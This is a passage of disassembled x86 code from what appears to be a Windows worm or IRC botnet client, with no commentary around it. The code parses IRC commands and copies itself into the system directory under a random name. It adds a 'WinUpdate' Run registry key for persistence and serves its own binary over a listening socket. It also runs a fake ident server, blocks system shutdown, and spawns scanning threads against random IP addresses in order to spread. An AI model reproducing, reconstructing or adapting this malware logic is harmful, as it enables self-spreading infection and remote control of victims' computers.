push offset aE ; "e"
push ecx
call ebp ; lstrcmpA
test eax, eax
jnz short loc_4029FD
push edi
call dword_4010B4 ; lstrlenA
cmp eax, 0FFh
jge short loc_4029FD
mov esi, dword_401078
call esi ; GetTickCount
sub eax, dword_404F60
cmp eax, 927C0h
jbe short loc_4029FD
push edi
push offset dword_404E38
call dword_401074 ; lstrcpyA
push offset asc_404D68 ; "|"
push offset dword_404E38
call dword_4010BC ; lstrcatA
lea edx, [esp+278h+var_100]
push edx
call sub_402790
add esp, 4
test eax, eax
jnz short loc_4029FD
call esi ; GetTickCount
mov esi, [esp+278h+var_268]
mov dword_404F60, eax
push offset a1 ; "-1"
mov ecx, esi
lea eax, [esi+30h]
mov dword_404F38, 1
push eax
call sub_402480
jmp short loc_402A01
; ---------------------------------------------------------------------------
loc_4029FD: ; CODE XREF: sub_4028D0+B1�j
; sub_4028D0+BF�j ...
mov esi, [esp+278h+var_268]
loc_402A01: ; CODE XREF: sub_4028D0+12B�j
lea ecx, [esp+278h+var_200]
push offset aI ; "i"
push ecx
call ebp ; lstrcmpA
test eax, eax
jnz short loc_402A41
mov edx, dword_404F9C
mov eax, dword_404F68
push edx
push eax
lea ecx, [esp+280h+var_264]
push offset aDD5 ; "%d,%d,5"
push ecx
call dword_4010E8 ; wsprintfA
add esp, 10h
lea edx, [esp+278h+var_264]
lea eax, [esi+30h]
mov ecx, esi
push edx
push eax
call sub_402480
loc_402A41: ; CODE XREF: sub_4028D0+13F�j
lea ecx, [esp+278h+var_200]
push offset aQ ; "q"
push ecx
call ebp ; lstrcmpA
test eax, eax
jnz short loc_402A69
mov eax, dword_404F38
test eax, eax
jz short loc_402A69
mov ecx, esi
call sub_402230
push 0
call dword_4010C0 ; ExitProcess
loc_402A69: ; CODE XREF: sub_4028D0+17F�j
; sub_4028D0+188�j
mov ebp, [esp+278h+arg_0]
mov byte ptr [ebx], 7Ch
loc_402A73: ; CODE XREF: sub_4028D0+27�j
; sub_4028D0+37�j ...
mov eax, dword_404F38
test eax, eax
jz short loc_402AE7
push offset aJoin ; "JOIN"
push ebp
call sub_4036C6 ; strstr
add esp, 8
test eax, eax
jz short loc_402AE7
lea esi, [eax-1]
cmp esi, ebp
jb short loc_402A9F
loc_402A95: ; CODE XREF: sub_4028D0+1CD�j
cmp byte ptr [esi], 3Ah
jz short loc_402AA4
dec esi
cmp esi, ebp
jnb short loc_402A95
loc_402A9F: ; CODE XREF: sub_4028D0+1C3�j
cmp byte ptr [esi], 3Ah
jnz short loc_402AE7
loc_402AA4: ; CODE XREF: sub_4028D0+1C8�j
lea ebx, [esi+1]
push 21h
push ebx
call sub_4036C0 ; strchr
mov edi, eax
add esp, 8
test edi, edi
jz short loc_402AE7
mov edx, edi
sub edx, esi
dec edx
cmp edx, 64h
jge short loc_402AE7
lea eax, [esp+278h+var_264]
push ebx
push eax
mov byte ptr [edi], 0
call dword_401074 ; lstrcpyA
lea ecx, [esp+278h+var_264]
push offset dword_404E38
push ecx
mov ecx, [esp+280h+var_268]
call sub_402480
mov byte ptr [edi], 21h
loc_402AE7: ; CODE XREF: sub_4028D0+1AA�j
; sub_4028D0+1BC�j ...
pop edi
pop esi
pop ebp
pop ebx
add esp, 268h
retn 4
sub_4028D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402B00 proc near ; CODE XREF: sub_402CF0+128�p
; UPX0:00402ED9�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
mov edx, [esp+arg_0]
lea eax, [esp+arg_4]
push eax
push 0
push ecx
push edx
push 0
push 0
call dword_4010AC ; CreateThread
push eax
call dword_401088 ; CloseHandle
retn
sub_402B00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402B30 proc near ; CODE XREF: sub_401E10+8E�p
; sub_401E10+164�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
mov edi, [esp+8+arg_4]
xor esi, esi
test edi, edi
jle short loc_402B61
push ebx
mov ebx, [esp+0Ch+arg_0]
loc_402B41: ; CODE XREF: sub_402B30+27�j
call sub_403680 ; rand
cdq
mov ecx, 1Ah
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_402B41
mov byte ptr [ebx+edi], 0
pop ebx
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_402B61: ; CODE XREF: sub_402B30+A�j
mov edx, [esp+8+arg_0]
mov byte ptr [edx+edi], 0
pop edi
pop esi
retn
sub_402B30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402B70 proc near ; CODE XREF: sub_401340+1B5�p
; sub_402790+11F�p
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_44 = dword ptr -44h
var_14 = word ptr -14h
arg_0 = dword ptr 4
arg_4 = word ptr 8
sub esp, 54h
push esi
push edi
mov ecx, 11h
xor eax, eax
lea edi, [esp+5Ch+var_44]
lea edx, [esp+5Ch+var_44]
rep stosd
mov ax, [esp+5Ch+arg_4]
lea ecx, [esp+5Ch+var_54]
push ecx
push edx
push 0
push 0
push 0
mov [esp+70h+var_14], ax
mov eax, [esp+70h+arg_0]
push 0
push 0
push 0
push eax
push 0
mov [esp+84h+var_44], 44h
call dword_4010C8 ; CreateProcessA
mov ecx, [esp+5Ch+var_50]
mov edi, dword_401088
push ecx
mov esi, eax
call edi ; CloseHandle
mov edx, [esp+5Ch+var_54]
push edx
call edi ; CloseHandle
mov eax, esi
pop edi
pop esi
add esp, 54h
retn
sub_402B70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402BE0 proc near ; CODE XREF: sub_401E10+1F�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_401114 ; inet_addr
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_402BFD
test esi, esi
jnz short loc_402C0F
cmp byte ptr [edi], 30h
jz short loc_402C19
loc_402BFD: ; CODE XREF: sub_402BE0+12�j
push edi
call dword_401118 ; gethostbyname
test eax, eax
jz short loc_402C0F
mov eax, [eax+0Ch]
mov ecx, [eax]
mov esi, [ecx]
loc_402C0F: ; CODE XREF: sub_402BE0+16�j
; sub_402BE0+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_402C19
pop edi
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_402C19: ; CODE XREF: sub_402BE0+1B�j
; sub_402BE0+32�j
mov eax, esi
pop edi
pop esi
retn
sub_402BE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402C20 proc near ; CODE XREF: sub_4031F0+5C�p
; UPX0:loc_4032CB�p
var_34 = byte ptr -34h
sub esp, 34h
lea eax, [esp+34h+var_34]
push 31h
push eax
call dword_40110C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_402C41
call dword_401110 ; WSAGetLastError
xor eax, eax
add esp, 34h
retn
; ---------------------------------------------------------------------------
loc_402C41: ; CODE XREF: sub_402C20+13�j
lea ecx, [esp+34h+var_34]
push ecx
call dword_401118 ; gethostbyname
test eax, eax
jnz short loc_402C59
mov eax, 100007Fh
add esp, 34h
retn
; ---------------------------------------------------------------------------
loc_402C59: ; CODE XREF: sub_402C20+2E�j
mov edx, [eax+0Ch]
mov eax, [edx]
mov eax, [eax]
add esp, 34h
retn
sub_402C20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402C70 proc near ; CODE XREF: sub_4022A0:loc_402303�p
; sub_4022A0+19F�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_4010FC ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_402C70 endp
; ---------------------------------------------------------------------------
align 10h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
align 10h
loc_402CA0: ; DATA XREF: sub_402CF0+123�o
mov eax, dword_404F6C
mov ecx, dword_404F64
push esi
mov esi, [esp+8]
push 0
push eax
push ecx
push esi
call dword_401148 ; send
push 7D0h
call dword_4010B8 ; Sleep
push offset dword_404F68
call dword_401070 ; InterlockedIncrement
push 2
push esi
call dword_40113C ; shutdown
push esi
call dword_401140 ; closesocket
push 0
call dword_4010A0 ; ExitThread
xor eax, eax
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_402CF0 proc near ; DATA XREF: UPX0:00402EFC�o
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_108 = byte ptr -108h
sub esp, 130h
lea eax, [esp+130h+var_108]
mov dword_404F68, 0
push ebp
push esi
push edi
push 104h
push eax
push 0
call dword_401064 ; GetModuleFileNameA
push 0
push 0
push 3
push 0
push 1
lea ecx, [esp+150h+var_108]
push 80000000h
push ecx
call dword_401090 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_402D3E
push 1
call dword_4010A0 ; ExitThread
loc_402D3E: ; CODE XREF: sub_402CF0+44�j
push 0
push esi
call dword_401068 ; GetFileSize
push eax
mov dword_404F6C, eax
call sub_403640
mov ecx, dword_404F6C
add esp, 4
lea edx, [esp+13Ch+var_120]
mov dword_404F64, eax
push 0
push edx
push ecx
push eax
push esi
call dword_40106C ; ReadFile
push esi
mov edx, [esp+140h+var_120]
mov dword_404F6C, edx
call dword_401088 ; CloseHandle
push 0
push 1
push 2
call dword_401128 ; socket
mov esi, eax
xor eax, eax
mov edi, dword_40112C
mov ebp, dword_401130
mov [esp+13Ch+var_130], eax
mov word ptr [esp+13Ch+var_130], 2
mov [esp+13Ch+var_12C], eax
mov [esp+13Ch+var_128], eax
mov [esp+13Ch+var_124], eax
mov [esp+13Ch+var_12C], eax
loc_402DB8: ; CODE XREF: sub_402CF0+DE�j
; sub_402CF0+E6�j ...
call sub_403680 ; rand
add eax, 7D0h
and eax, 1FFFh
test al, al
mov dword_404F94, eax
jz short loc_402DB8
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_402DB8
push eax
call edi ; ntohs
lea edx, [esp+13Ch+var_130]
push 10h
push edx
push esi
mov word ptr [esp+148h+var_130+2], ax
call ebp ; bind
test eax, eax
jnz short loc_402DB8
push 64h
push esi
call dword_401134 ; listen
mov edi, dword_401138
mov [esp+13Ch+var_11C], 10h
loc_402E05: ; CODE XREF: sub_402CF0+130�j
lea eax, [esp+13Ch+var_11C]
lea ecx, [esp+13Ch+var_118]
push eax
push ecx
push esi
call edi ; accept
push eax
push offset loc_402CA0
call sub_402B00
add esp, 8
jmp short loc_402E05
sub_402CF0 endp
; ---------------------------------------------------------------------------
align 10h
loc_402E30: ; CODE XREF: UPX1:00407098�j
sub esp, 190h
push esi
push edi
push 0
call dword_401054 ; GetModuleHandleA
mov dword_404F98, eax
lea eax, [esp+8]
push eax
push 2
call dword_401104 ; WSAStartup
push offset aU ; "-u"
call dword_401058 ; GetCommandLineA
push eax
call sub_4036C6 ; strstr
mov esi, eax
add esp, 8
neg esi
sbb esi, esi
push offset aGo_exe ; "go.exe"
neg esi
call dword_40105C ; DeleteFileA
call dword_401078 ; GetTickCount
push eax
call sub_403686 ; srand
mov edi, dword_401060
add esp, 4
push offset aR10 ; "r10"
push 1
push 0
call edi ; CreateMutexA
push offset aU2 ; "u2"
push 1
push 0
call edi ; CreateMutexA
push offset aUterm5 ; "uterm5"
push 1
push 0
call edi ; CreateMutexA
mov dword_404F70, eax
call dword_40107C ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_402EC9
push 1
call dword_4010C0 ; ExitProcess
loc_402EC9: ; CODE XREF: UPX0:00402EBF�j
test esi, esi
jnz short loc_402ED2
call sub_403540
loc_402ED2: ; CODE XREF: UPX0:00402ECB�j
push 0
push offset sub_402F80
call sub_402B00
mov esi, dword_4010B8
add esp, 8
push 1F4h
call esi ; Sleep
push 0
push offset sub_402590
call sub_402B00
push 0
push offset sub_402CF0
call sub_402B00
push 0
push offset sub_4015E0
call sub_402B00
push 0
push offset loc_4032A0
call sub_402B00
mov edi, dword_401018
add esp, 20h
loc_402F27: ; CODE XREF: UPX0:00402F32�j
push 0
call edi ; AbortSystemShutdownA
push 1388h
call esi ; Sleep
jmp short loc_402F27
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402F40 proc near ; CODE XREF: sub_402F80+135�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, esi
or ecx, 0FFFFFFFFh
xor eax, eax
xor edx, edx
repne scasb
not ecx
dec ecx
jz short loc_402F76
loc_402F56: ; CODE XREF: sub_402F40+34�j
mov al, [edx+esi]
cmp al, 0Ah
jz short loc_402F61
cmp al, 0Dh
jnz short loc_402F65
loc_402F61: ; CODE XREF: sub_402F40+1B�j
mov byte ptr [edx+esi], 0
loc_402F65: ; CODE XREF: sub_402F40+1F�j
mov edi, esi
or ecx, 0FFFFFFFFh
xor eax, eax
inc edx
repne scasb
not ecx
dec ecx
cmp edx, ecx
jb short loc_402F56
loc_402F76: ; CODE XREF: sub_402F40+14�j
pop edi
pop esi
retn
sub_402F40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F80 proc near ; DATA XREF: UPX0:00402ED4�o
var_148 = byte ptr -148h
var_48 = byte ptr -48h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 148h
push esi
push edi
mov [ebp+var_8], esp
call dword_401078 ; GetTickCount
imul eax, [ebp+var_8]
push eax
call sub_403686 ; srand
call sub_403680 ; rand
and eax, 80000003h
jns short loc_402FAF
dec eax
or eax, 0FFFFFFFCh
inc eax
loc_402FAF: ; CODE XREF: sub_402F80+28�j
add eax, 3
push eax
lea eax, [ebp+var_48]
push eax
call sub_402B30
lea edi, [ebp+var_48]
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 0Ch
repne scasb
not ecx
sub edi, ecx
push eax
mov edx, ecx
mov esi, edi
mov edi, offset dword_404F74
push 1
shr ecx, 2
rep movsd
mov ecx, edx
push 2
and ecx, 3
mov [ebp+var_4], 10h
rep movsb
call dword_401128 ; socket
mov esi, eax
push 0
mov [ebp+var_8], esi
mov [ebp+var_18], 2
call dword_401108 ; ntohl
push 71h
mov [ebp+var_14], eax
call dword_40112C ; ntohs
mov [ebp+var_16], ax
mov eax, [ebp+var_4]
lea ecx, [ebp+var_18]
push eax
push ecx
push esi
call dword_401130 ; bind
test eax, eax
jz short loc_403036
pop edi
mov eax, 1
pop esi
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_403036: ; CODE XREF: sub_402F80+A7�j
push ebx
push 5
push esi
call dword_401134 ; listen
test eax, eax
jz short loc_403052
pop ebx
pop edi
mov eax, 1
pop esi
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_403052: ; CODE XREF: sub_402F80+C2�j
; sub_402F80+124�j ...
mov edi, dword_401138
lea edx, [ebp+var_4]
lea eax, [ebp+var_28]
push edx
push eax
push esi
call edi ; accept
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_403084
loc_40306A: ; CODE XREF: sub_402F80+102�j
push 64h
call dword_4010B8 ; Sleep
lea ecx, [ebp+var_4]
lea edx, [ebp+var_28]
push ecx
push edx
push esi
call edi ; accept
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_40306A
loc_403084: ; CODE XREF: sub_402F80+E8�j
push 0
lea eax, [ebp+var_148]
push 100h
push eax
push ebx
call dword_401144 ; recv
test eax, eax
jnz short loc_4030A6
push ebx
call dword_401140 ; closesocket
jmp short loc_403052
; ---------------------------------------------------------------------------
loc_4030A6: ; CODE XREF: sub_402F80+11B�j
lea ecx, [ebp+var_148]
mov [ebp+eax+var_148], 0
push ecx
call sub_402F40
or ecx, 0FFFFFFFFh
mov edi, offset aUseridUnix ; " : USERID : UNIX : "
xor eax, eax
add esp, 4
repne scasb
not ecx
sub edi, ecx
lea edx, [ebp+var_148]
mov esi, edi
mov edi, edx
mov edx, ecx
or ecx, 0FFFFFFFFh
repne scasb
mov ecx, edx
dec edi
shr ecx, 2
rep movsd
mov ecx, edx
lea edx, [ebp+var_148]
and ecx, 3
push eax
rep movsb
mov edi, offset dword_404F74
or ecx, 0FFFFFFFFh
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov edi, edx
mov edx, ecx
or ecx, 0FFFFFFFFh
repne scasb
mov ecx, edx
dec edi
shr ecx, 2
rep movsd
mov ecx, edx
lea edx, [ebp+var_148]
and ecx, 3
rep movsb
mov edi, offset asc_404D8C ; "\r\n"
or ecx, 0FFFFFFFFh
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov edi, edx
mov edx, ecx
or ecx, 0FFFFFFFFh
repne scasb
mov ecx, edx
dec edi
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
lea edi, [ebp+var_148]
or ecx, 0FFFFFFFFh
repne scasb
not ecx
dec ecx
lea eax, [ebp+var_148]
push ecx
push eax
push ebx
call dword_401148 ; send
push 1388h
call dword_4010B8 ; Sleep
push ebx
call dword_401140 ; closesocket
mov esi, [ebp+var_8]
jmp loc_403052
sub_402F80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403190 proc near ; DATA XREF: sub_4031F0+86�o
; UPX0:004032FC�o
var_1 = byte ptr -1
arg_3 = byte ptr 7
push ecx
mov al, [esp+4+arg_3]
push ebx
push esi
mov esi, dword_4010B8
mov [esp+0Ch+var_1], al
xor bl, bl
loc_4031A3: ; CODE XREF: sub_403190+4A�j
call sub_402C70
test eax, eax
jz short loc_4031DC
cmp [esp+0Ch+var_1], bl
jz short loc_4031D5
mov [esp+0Ch+arg_3], bl
mov ecx, [esp+10h]
push ecx
call sub_4016E0
add esp, 4
call sub_403680 ; rand
cdq
mov ecx, 190h
idiv ecx
add edx, ecx
push edx
call esi ; Sleep
loc_4031D5: ; CODE XREF: sub_403190+20�j
inc bl
cmp bl, 0FFh
jb short loc_4031A3
loc_4031DC: ; CODE XREF: sub_403190+1A�j
pop esi
xor eax, eax
pop ebx
pop ecx
retn 4
sub_403190 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4031F0 proc near ; DATA XREF: UPX0:00403310�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_401078 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call sub_403686 ; srand
add esp, 4
call nullsub_1
mov ebx, dword_401070
mov edi, dword_4010B8
loc_40322C: ; CODE XREF: sub_4031F0+66�j
; sub_4031F0+AE�j
call sub_403680 ; rand
mov byte ptr [ebp+var_4+1], al
call sub_403680 ; rand
mov byte ptr [ebp+var_4+3], al
call sub_403680 ; rand
mov byte ptr [ebp+var_4+2], al
call sub_403680 ; rand
mov byte ptr [ebp+var_4], al
call sub_402C20
mov esi, [ebp+var_4]
cmp esi, eax
jz short loc_40322C
call sub_402C70
test eax, eax
jz short loc_403285
push offset dword_404F9C
call ebx ; InterlockedIncrement
push esi
call sub_4016E0
add esp, 4
test eax, eax
jnz short loc_40328C
push esi
push offset sub_403190
call sub_402B00
add esp, 8
jmp short loc_40328C
; ---------------------------------------------------------------------------
loc_403285: ; CODE XREF: sub_4031F0+6F�j
push 1388h
call edi ; Sleep
loc_40328C: ; CODE XREF: sub_4031F0+83�j
; sub_4031F0+93�j
call sub_403680 ; rand
cdq
mov ecx, 190h
idiv ecx
add edx, ecx
push edx
call edi ; Sleep
jmp short loc_40322C
sub_4031F0 endp
; ---------------------------------------------------------------------------
loc_4032A0: ; DATA XREF: UPX0:00402F14�o
push esi
push edi
mov dword_404F9C, 0
call sub_402C70
mov edi, dword_4010B8
test eax, eax
jnz short loc_4032CB
loc_4032BB: ; CODE XREF: UPX0:004032C9�j
push 1388h
call edi ; Sleep
call sub_402C70
test eax, eax
jz short loc_4032BB
loc_4032CB: ; CODE XREF: UPX0:004032B9�j
call sub_402C20
mov esi, eax
mov ax, word ptr dword_404F94
push eax
call dword_40112C ; ntohs
mov ecx, esi
mov word_404122, ax
xor ecx, 0AAAAAAAAh
cmp esi, 100007Fh
mov dword_404124, ecx
jz short loc_403309
push esi
push offset sub_403190
call sub_402B00
add esp, 8
loc_403309: ; CODE XREF: UPX0:004032F9�j
mov esi, 50h
loc_40330E: ; CODE XREF: UPX0:0040331E�j
push 0
push offset sub_4031F0
call sub_402B00
add esp, 8
dec esi
jnz short loc_40330E
push 0FFFFFFFFh
call edi ; Sleep
pop edi
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403330 proc near ; CODE XREF: sub_403540+C9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_4]
mov edx, [esp+arg_0]
lea eax, [esp+arg_4]
push eax
push 0F003Fh
push 0
push ecx
push edx
call dword_40100C ; RegOpenKeyExA
test eax, eax
jnz short locret_40336B
mov eax, [esp+arg_8]
mov ecx, [esp+arg_4]
push eax
push ecx
call dword_401010 ; RegDeleteValueA
mov edx, [esp+arg_4]
push edx
call dword_401014 ; RegCloseKey
locret_40336B: ; CODE XREF: sub_403330+1E�j
retn
sub_403330 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403370 proc near ; CODE XREF: sub_403540+3D�p
; sub_403540+A4�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
push ecx
mov eax, [esp+4+arg_10]
mov edx, [esp+4+arg_4]
lea ecx, [esp+4+arg_10]
mov [esp+4+var_4], eax
mov eax, [esp+4+arg_0]
push ecx
push 0F003Fh
push 0
push edx
push eax
call dword_40100C ; RegOpenKeyExA
test eax, eax
jz short loc_4033A0
mov eax, 1
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4033A0: ; CODE XREF: sub_403370+27�j
mov edx, [esp+4+arg_C]
lea ecx, [esp+4+var_4]
push ecx
mov ecx, [esp+8+arg_8]
lea eax, [esp+8+arg_4]
push edx
mov edx, [esp+0Ch+arg_10]
push eax
push 0
push ecx
push edx
call dword_401008 ; RegQueryValueExA
test eax, eax
jz short loc_4033D7
mov eax, [esp+arg_14]
push eax
call dword_401014 ; RegCloseKey
mov eax, 2
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4033D7: ; CODE XREF: sub_403370+53�j
mov ecx, [esp+arg_14]
push ecx
call dword_401014 ; RegCloseKey
xor eax, eax
pop ecx
retn
sub_403370 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4033F0 proc near ; CODE XREF: sub_403460+A1�p
; sub_403540+5F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
mov ecx, [esp+arg_4]
mov edx, [esp+arg_0]
lea eax, [esp+arg_4]
push 0
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push ecx
push edx
call dword_401000 ; RegCreateKeyExA
test eax, eax
jz short loc_40341E
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_40341E: ; CODE XREF: sub_4033F0+26�j
mov eax, [esp+arg_10]
mov ecx, [esp+arg_C]
mov edx, [esp+arg_8]
push eax
mov eax, [esp+4+arg_4]
push ecx
push 1
push 0
push edx
push eax
call dword_401004 ; RegSetValueExA
test eax, eax
jz short loc_403451
mov ecx, [esp+arg_4]
push ecx
call dword_401014 ; RegCloseKey
mov eax, 2
retn
; ---------------------------------------------------------------------------
loc_403451: ; CODE XREF: sub_4033F0+4E�j
mov edx, [esp+arg_4]
push edx
call dword_401014 ; RegCloseKey
xor eax, eax
retn
sub_4033F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403460 proc near ; CODE XREF: sub_403540+6B�p
; sub_403540+E2�p
var_78 = byte ptr -78h
var_64 = byte ptr -64h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
sub esp, 78h
test eax, eax
jz short loc_403472
push eax
call dword_40105C ; DeleteFileA
loc_403472: ; CODE XREF: sub_403460+9�j
lea eax, [esp+78h+var_64]
push 63h
push eax
call dword_40109C ; GetSystemDirectoryA
test eax, eax
jz loc_403537
push esi
call sub_403680 ; rand
and eax, 3
lea ecx, [esp+7Ch+var_78]
add eax, 5
push eax
push ecx
call sub_402B30
mov esi, dword_4010BC
add esp, 8
lea edx, [esp+7Ch+var_78]
push offset a_exe ; ".exe"
push edx
call esi ; lstrcatA
lea eax, [esp+7Ch+var_64]
push offset asc_404D18 ; "\\"
push eax
call esi ; lstrcatA
lea ecx, [esp+7Ch+var_78]
lea edx, [esp+7Ch+var_64]
push ecx
push edx
call esi ; lstrcatA
mov ecx, [esp+7Ch+arg_4]
lea eax, [esp+7Ch+var_64]
push 0
push eax
push ecx
call dword_40104C ; CopyFileA
lea edx, [esp+7Ch+var_64]
push edx
call dword_4010B4 ; lstrlenA
inc eax
push eax
lea eax, [esp+80h+var_64]
push eax
push offset aWinupdate ; "WinUpdate"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_4033F0
mov ecx, dword_404F70
add esp, 14h
push ecx
call dword_401088 ; CloseHandle
lea edx, [esp+7Ch+var_64]
push 0
push edx
call dword_401050 ; WinExec
push 1F4h
call dword_4010B8 ; Sleep
push 0
call dword_4010C0 ; ExitProcess
pop esi
loc_403537: ; CODE XREF: sub_403460+21�j
add esp, 78h
retn
sub_403460 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403540 proc near ; CODE XREF: UPX0:00402ECD�p
var_DC = byte ptr -0DCh
var_C8 = byte ptr -0C8h
var_64 = byte ptr -64h
sub esp, 0DCh
lea eax, [esp+0DCh+var_C8]
push 63h
push eax
push 0
call dword_401064 ; GetModuleFileNameA
test eax, eax
jz loc_40362A
lea ecx, [esp+0DCh+var_64]
push 63h
push ecx
push offset aWinupdate ; "WinUpdate"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_404FA0, 0
call sub_403370
add esp, 14h
test eax, eax
jz short loc_4035BA
push 2
push offset a1_0 ; "1"
push offset aServer ; "Server"
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push 80000002h
call sub_4033F0
lea edx, [esp+0F0h+var_C8]
push edx
push 0
call sub_403460
add esp, 1Ch
add esp, 0DCh
retn
; ---------------------------------------------------------------------------
loc_4035BA: ; CODE XREF: sub_403540+47�j
lea eax, [esp+0DCh+var_C8]
lea ecx, [esp+0DCh+var_64]
push eax
push ecx
call dword_401048 ; lstrcmpiA
test eax, eax
jnz short loc_403618
lea edx, [esp+0DCh+var_DC]
push 14h
push edx
push offset aServer ; "Server"
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push 80000002h
call sub_403370
add esp, 14h
test eax, eax
jnz short loc_40362A
push offset aServer ; "Server"
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push 80000002h
mov dword_404FA0, 1
call sub_403330
add esp, 0Ch
add esp, 0DCh
retn
; ---------------------------------------------------------------------------
loc_403618: ; CODE XREF: sub_403540+8C�j
lea eax, [esp+0DCh+var_C8]
lea ecx, [esp+0DCh+var_64]
push eax
push ecx
call sub_403460
add esp, 8
loc_40362A: ; CODE XREF: sub_403540+17�j
; sub_403540+AE�j
add esp, 0DCh
retn
sub_403540 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403640 proc near ; CODE XREF: sub_4011F0+29�p
; sub_401520+24�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push 4
push 1000h
push eax
push 0
call dword_401044 ; VirtualAlloc
retn
sub_403640 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403660 proc near ; CODE XREF: sub_4011F0+EE�p
; sub_4011F0+136�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push 8000h
push 0
push eax
call dword_401040 ; VirtualFree
retn
sub_403660 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403680 proc near ; CODE XREF: sub_4011F0+11F�p
; sub_402230+9�p ...
jmp dword_4010E0
sub_403680 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403686 proc near ; CODE XREF: sub_4011F0+117�p
; sub_402510+32�p ...
jmp dword_4010DC
sub_403686 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403690 proc near ; CODE XREF: sub_4016E0+5�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
